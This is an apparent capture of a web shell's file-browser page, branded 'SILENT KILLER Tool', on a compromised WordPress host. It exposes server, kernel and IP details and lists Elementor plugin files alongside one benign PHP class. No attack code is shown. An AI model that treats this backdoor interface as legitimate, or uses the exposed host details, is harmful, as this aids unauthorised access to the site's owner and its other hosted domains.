Current Path: > home > transcarter > > www > wp-content > plugins > elementor > modules > atomic-widgets > styles
Operation : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64 Software : Apache Server IP : 198.54.126.42 | Your IP: 216.73.216.135 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
atomic-widget-base-styles.php | File | 1249 bytes | July 17 2025 21:06:23. | |
atomic-widget-styles.php | File | 969 bytes | July 17 2025 21:06:23. | |
style-definition.php | File | 759 bytes | July 17 2025 21:06:23. | |
style-schema.php | File | 7212 bytes | July 17 2025 21:06:23. | |
style-variant.php | File | 773 bytes | July 17 2025 21:06:23. | |
styles-renderer.php | File | 4356 bytes | July 17 2025 21:06:23. |
<?php namespace Elementor\Modules\AtomicWidgets\Styles; class Style_Variant { private ?string $breakpoint = null; private ?string $state = null; /** @var array<string, array> */ private array $props = []; public static function make(): self { return new self(); } public function set_breakpoint( string $breakpoint ): self { $this->breakpoint = $breakpoint; return $this; } public function set_state( string $state ): self { $this->state = $state; return $this; } public function add_prop( string $key, $value ): self { $this->props[ $key ] = $value; return $this; } public function build(): array { return [ 'meta' => [ 'breakpoint' => $this->breakpoint, 'state' => $this->state, ], 'props' => $this->props, ]; } }
SILENT KILLER Tool